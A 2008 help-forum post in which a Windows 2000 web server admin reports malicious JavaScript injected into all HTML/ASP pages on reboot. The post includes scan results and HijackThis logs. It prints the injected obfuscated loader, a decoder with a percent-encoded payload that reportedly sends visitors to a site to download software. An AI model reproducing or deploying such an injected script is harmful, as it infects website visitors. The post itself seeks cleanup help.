Jump to content

Welcome to Geeks to Go - Register now for FREE

Need help with your computer or device? Want to learn new tech skills? You're in the right place!
Geeks to Go is a friendly community of tech experts who can solve any problem you have. Just create a free account and post your question. Our volunteers will reply quickly and guide you through the steps. Don't let tech troubles stop you. Join Geeks to Go now and get the support you need!

How it Works Create Account
Photo

Win2000 Server Malicious Code Injected to Web Pages

Started by arbpen , Feb 19 2008 12:03 AM

  • Please log in to reply

#1
arbpen
Posted 19 February 2008 - 12:03 AM

arbpen

    New Member

  • Member
  • Pip
  • 1 posts
Upon rebooting of the server, all HTML and ASP files have malicious javascript injected that goes to some web site and attempts to download software onto a user's machine. Luckily, no users of the web site have been affected because the web site has been put into maintenance mode - however, it cannot stay like that forever, and at some point, I WILL have to reboot - I don't want the pages to get infected again.

The malicious code is this:
<script language = "javascript">function monkey(s){
//var s1=unescape(s.substr(0,s.length)); var t='';
//for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)+7);
//document.write(unescape(t));
};
//monkey('%35%4C%5C%6B%62%69%6D%19%45%5A%67%60%6E%5A%60%5E%36%20%43%5A%6F%5A%6C%5C%6B%62%69%6D%20%37%5D%68%5C%6E%66%5E%67%6D%27%70%6B%62%6D%5E%21%6E%67%5E%6C%5C%5A%69%5E%21%20%1E%2C%3C%1E%2F%32%1E%2F%2F%1E%30%2B%1E%2F%2A%1E%2F%3D%1E%2F%2E%1E%2B%29%1E%30%2C%1E%30%2B%1E%2F%2C%1E%2C%3D%1E%2B%2B%1E%2F%31%1E%30%2D%1E%30%2D%1E%30%29%1E%2C%3A%1E%2B%3F%1E%2B%3F%1E%2E%2C%1E%2C%2F%1E%2F%3A%1E%2E%30%1E%2E%29%1E%2D%3A%1E%2C%30%1E%2B%3E%1E%2F%2D%1E%2D%2A%1E%2F%30%1E%2D%3F%1E%2E%2D%1E%2F%31%1E%2B%3E%1E%2F%32%1E%2D%3E%1E%2B%3F%1E%2B%2B%1E%2B%29%1E%30%30%1E%2F%32%1E%2F%2D%1E%30%2D%1E%2F%31%1E%2C%3D%1E%2C%29%1E%2B%29%1E%2F%31%1E%2F%2E%1E%2F%32%1E%2F%30%1E%2F%31%1E%30%2D%1E%2C%3D%1E%2C%29%1E%2C%3E%1E%2C%3C%1E%2B%3F%1E%2F%32%1E%2F%2F%1E%30%2B%1E%2F%2A%1E%2F%3D%1E%2F%2E%1E%2C%3E%20%22%22%34%35%28%6C%5C%6B%62%69%6D%37'); </script>
I have commented it, and the monkey part is not always the same - makes it really difficult to do a search and replace.

I had run Norton AV and it found nothing. I also ran Sophos rootkit, and it came out clean. Then I ran Panda ActiveScan and it found several things. The contents of that file is below:

Incident Status Location

Spyware:Cookie/Falkag Not disinfected C:\Documents and Settings\Administrator.ATLAS\Cookies\[email protected][1].txt
Spyware:Cookie/Adtech Not disinfected C:\Documents and Settings\Administrator.ATLAS\Cookies\administrator@adtech[2].txt
Spyware:Cookie/Falkag Not disinfected C:\Documents and Settings\Administrator.ATLAS\Cookies\[email protected][1].txt
Spyware:Cookie/HotLog Not disinfected C:\Documents and Settings\Administrator.ATLAS\Cookies\administrator@hotlog[1].txt
Spyware:Cookie/Overture Not disinfected C:\Documents and Settings\Administrator.ATLAS\Cookies\administrator@overture[1].txt
Spyware:Cookie/Tickle Not disinfected C:\Documents and Settings\Administrator.ATLAS\Cookies\administrator@tickle[1].txt
Spyware:Cookie/Toplist Not disinfected C:\Documents and Settings\Administrator.ATLAS\Cookies\administrator@toplist[1].txt
Spyware:Cookie/Traffic Marketplace Not disinfected C:\Documents and Settings\Administrator.ATLAS\Cookies\administrator@trafficmp[1].txt
Spyware:Cookie/Tribalfusion Not disinfected C:\Documents and Settings\Administrator.ATLAS\Cookies\administrator@tribalfusion[1].txt
Spyware:Cookie/Xiti Not disinfected C:\Documents and Settings\Administrator.ATLAS\Cookies\administrator@xiti[1].txt
Potentially unwanted tool:Application/Pskill.A Not disinfected C:\RECYCLER\S-1-5-21\pskill.exe
Potentially unwanted tool:Application/Pskill.A Not disinfected C:\RECYCLER\S-1-5-22\pskill.exe
Potentially unwanted tool:Application/ToolWget Not disinfected C:\RECYCLER\scr.exe
Potentially unwanted tool:Application/ToolWget Not disinfected C:\RECYCLER\wget.exe
Potentially unwanted tool:Application/ServUBased.DE Not disinfected C:\WINNT\system32\csrms.exe
Potentially unwanted tool:Application/ToolWget Not disinfected C:\WINNT\system32\johnny.exe
Additionally, I ran hijackthis, and this is what it found (it looks pretty innocent, just programs a web server would run - but I could be wrong). Hijackthis below:
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 10:00:16 PM, on 2/18/2008
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Boot mode: Normal

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\System32\termsrv.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\Program Files\Symantec_Client_Security\Symantec AntiVirus\DefWatch.exe
C:\PROGRA~1\PERSIT~1\AspEmail\EMAILA~1\BIN\EMAILA~1.EXE
C:\WINNT\System32\inetsrv\inetinfo.exe
C:\WINNT\System32\llssrv.exe
C:\Program Files\LogMeIn\x86\RaMaint.exe
C:\Program Files\LogMeIn\x86\LogMeIn.exe
C:\Program Files\Symantec_Client_Security\Symantec AntiVirus\Rtvscan.exe
c:\program files\raxco\perfectdisk\pdtasks.exe
C:\WINNT\system32\RsFsa.exe
C:\WINNT\system32\RsSub.exe
C:\WINNT\System32\locator.exe
C:\WINNT\system32\MSTask.exe
C:\WINNT\System32\snmp.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\system32\termsvc.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\Dfssvc.exe
C:\WINNT\System32\msdtc.exe
C:\Program Files\Common Files\System\MSSearch\Bin\mssearch.exe
C:\WINNT\system32\logon.scr
C:\Autoletters\PeriodicAutoletters.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\rdpclip.exe
C:\WINNT\Explorer.EXE
C:\Program Files\American Systems\EZ Scheduler\EZScheduler.exe
C:\tools\v21\AtomicTime.exe
C:\Program Files\LogMeIn\x86\LogMeInSystray.exe
C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://apod.nasa.gov...d/astropix.html
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O4 - HKLM\..\Run: [AtiPTA] atiptaxx.exe
O4 - HKLM\..\Run: [EZ Scheduler] C:\Program Files\American Systems\EZ Scheduler\EZScheduler.exe /m
O4 - HKLM\..\Run: [vptray] C:\PROGRA~1\SYMANT~1\SYMANT~1\vptray.exe
O4 - HKLM\..\Run: [AtomicTime] C:\tools\v21\AtomicTime.exe s
O4 - HKLM\..\Run: [LogMeIn GUI] "C:\Program Files\LogMeIn\x86\LogMeInSystray.exe"
O4 - HKUS\.DEFAULT\..\RunOnce: [^SetupICWDesktop] C:\Program Files\Internet Explorer\Connection Wizard\icwconn1.exe /desktop (User 'Default user')
O4 - Global Startup: Service Manager.lnk = C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm
O16 - DPF: {01A88BB1-1174-41EC-ACCB-963509EAE56B} (SysProWmi Class) - http://support.dell....iler/SysPro.CAB
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft....k/?linkid=39204
O16 - DPF: {5EF798EA-C110-4E8F-ABB7-0F49B22AAC9D} (Launcher Class) - http://www.eblvd.com/control/ebie.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.micros...b?1124292370343
O16 - DPF: {90A29DA5-D020-4B18-8660-6689520C7CD7} (DmiReader Class) - http://ftp.us.dell.c...es/PROFILER.CAB
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://acs.pandasoft...free/asinst.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{144FB99D-B61E-4C89-A337-22B54C9D8D8E}: NameServer = 4.2.2.1,4.2.2.2
O17 - HKLM\System\CS1\Services\Tcpip\..\{144FB99D-B61E-4C89-A337-22B54C9D8D8E}: NameServer = 4.2.2.1,4.2.2.2
O17 - HKLM\System\CS2\Services\Tcpip\..\{144FB99D-B61E-4C89-A337-22B54C9D8D8E}: NameServer = 4.2.2.1,4.2.2.2
O23 - Service: Ati HotKey Poller - Unknown owner - C:\WINNT\System32\Ati2evxx.exe
O23 - Service: Backup Exec Remote Agent for Windows Servers (BackupExecAgentAccelerator) - VERITAS Software Corporation - C:\Program Files\VERITAS\Backup Exec\RANT\beremote.exe
O23 - Service: DefWatch - Symantec Corporation - C:\Program Files\Symantec_Client_Security\Symantec AntiVirus\DefWatch.exe
O23 - Service: Logical Disk Manager Administrative Service (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
O23 - Service: Persits Software Email Agent (EmailAgent) - Persits Software, Inc. - C:\PROGRA~1\PERSIT~1\AspEmail\EMAILA~1\BIN\EMAILA~1.EXE
O23 - Service: LogMeIn Maintenance Service (LMIMaint) - LogMeIn, Inc. - C:\Program Files\LogMeIn\x86\RaMaint.exe
O23 - Service: LogMeIn - LogMeIn, Inc. - C:\Program Files\LogMeIn\x86\LogMeIn.exe
O23 - Service: Symantec AntiVirus Client (Norton AntiVirus Server) - Symantec Corporation - C:\Program Files\Symantec_Client_Security\Symantec AntiVirus\Rtvscan.exe
O23 - Service: Raxco PerfectDisk (RAXPD ) - RaxcoINC - c:\program files\raxco\perfectdisk\pdtasks.exe
O23 - Service: Terminal Services Licensing (Termsvc) - Unknown owner - C:\WINNT\system32\termsvc.exe

--
End of file - 5322 bytes

Here is also the uninstall log from Hijackthis:
AspEmail
ATI Display Driver
AtomicTime
Dell ResourceCD
EZ Scheduler
FileZilla (remove only)
HijackThis 2.0.2
HTML-Kit
IISState
InfoRapid Search & Replace
Intel® PRO Ethernet Adapter and Software
JGsoft EditPad Lite 6.3.1
LiveUpdate 1.7 (Symantec Corporation)
LiveUpdate Administration Utility
LogMeIn
Microsoft Baseline Security Analyzer 2.0.1
Microsoft SQL Server 2000
Mozilla Firefox (2.0.0.12)
MSXML 4.0 SP2 (KB927978)
MSXML 4.0 SP2 (KB936181)
Panda ActiveScan
PowerArchiver
Security Update for Windows Media Player (KB911564)
Security Update for Windows Media Player 6.4 (KB925398)
Sophos Anti-Rootkit 1.3.1
Spybot - Search & Destroy 1.4
Symantec AntiVirus Client
Update Rollup 1 for Windows 2000 SP4
VERITAS Backup Exec Remote Agent for Windows Servers
WatchGuard Vcontroller
Windows 2000 Administration Tools
Windows 2000 Hotfix - KB842773
Windows 2000 Hotfix - KB890046
Windows 2000 Hotfix - KB893756
Windows 2000 Hotfix - KB896358
Windows 2000 Hotfix - KB896422
Windows 2000 Hotfix - KB896423
Windows 2000 Hotfix - KB896424
Windows 2000 Hotfix - KB899587
Windows 2000 Hotfix - KB899589
Windows 2000 Hotfix - KB899591
Windows 2000 Hotfix - KB900725
Windows 2000 Hotfix - KB901017
Windows 2000 Hotfix - KB901214
Windows 2000 Hotfix - KB904706
Windows 2000 Hotfix - KB905414
Windows 2000 Hotfix - KB905495
Windows 2000 Hotfix - KB905749
Windows 2000 Hotfix - KB908519
Windows 2000 Hotfix - KB908531
Windows 2000 Hotfix - KB911280
Windows 2000 Hotfix - KB911567
Windows 2000 Hotfix - KB912919
Windows 2000 Hotfix - KB913580
Windows 2000 Hotfix - KB914388
Windows 2000 Hotfix - KB914389
Windows 2000 Hotfix - KB917008
Windows 2000 Hotfix - KB917422
Windows 2000 Hotfix - KB917537
Windows 2000 Hotfix - KB917736
Windows 2000 Hotfix - KB917953
Windows 2000 Hotfix - KB918118
Windows 2000 Hotfix - KB918899
Windows 2000 Hotfix - KB920213
Windows 2000 Hotfix - KB920670
Windows 2000 Hotfix - KB920683
Windows 2000 Hotfix - KB920685
Windows 2000 Hotfix - KB920958
Windows 2000 Hotfix - KB921398
Windows 2000 Hotfix - KB921503
Windows 2000 Hotfix - KB921883
Windows 2000 Hotfix - KB922582
Windows 2000 Hotfix - KB922616
Windows 2000 Hotfix - KB923191
Windows 2000 Hotfix - KB923414
Windows 2000 Hotfix - KB923694
Windows 2000 Hotfix - KB923810
Windows 2000 Hotfix - KB923980
Windows 2000 Hotfix - KB924191
Windows 2000 Hotfix - KB924270
Windows 2000 Hotfix - KB924667
Windows 2000 Hotfix - KB925454
Windows 2000 Hotfix - KB925486
Windows 2000 Hotfix - KB925902
Windows 2000 Hotfix - KB926122
Windows 2000 Hotfix - KB926247
Windows 2000 Hotfix - KB926436
Windows 2000 Hotfix - KB927891
Windows 2000 Hotfix - KB928090
Windows 2000 Hotfix - KB928843
Windows 2000 Hotfix - KB929969
Windows 2000 Hotfix - KB930178
Windows 2000 Hotfix - KB931768
Windows 2000 Hotfix - KB931784
Windows 2000 Hotfix - KB932168
Windows 2000 Hotfix - KB933566
Windows 2000 Hotfix - KB933729
Windows 2000 Hotfix - KB935839
Windows 2000 Hotfix - KB935840
Windows 2000 Hotfix - KB935966
Windows 2000 Hotfix - KB936021
Windows 2000 Hotfix - KB937143
Windows 2000 Hotfix - KB937894
Windows 2000 Hotfix - KB938127
Windows 2000 Hotfix - KB938827
Windows 2000 Hotfix - KB938829
Windows 2000 Hotfix - KB939653
Windows 2000 Hotfix - KB941202
Windows 2000 Hotfix - KB941568
Windows 2000 Hotfix - KB941644
Windows 2000 Hotfix - KB941672
Windows 2000 Hotfix - KB942615
Windows 2000 Hotfix - KB942831
Windows 2000 Hotfix - KB943055
Windows 2000 Hotfix - KB943485
Windows 2000 Hotfix - KB944533
Windows 2000 Service Pack 4
Windows Installer 3.1 (KB893803)
WinRAR archiver

There is a hardware firewall installed for this server. Before the firewall was installed, there was a brute force FTP attack, and I found a link supposedly to Symantec that was in actuality an infected file on the desktop. The file has since been erased, so I do not have it available.
  • 0

Advertisements

Back to Virus, Spyware, Malware Removal · Next Unread Topic →




Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

  1. Geeks to Go Community
  2. Security
  3. Virus, Spyware, Malware Removal

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP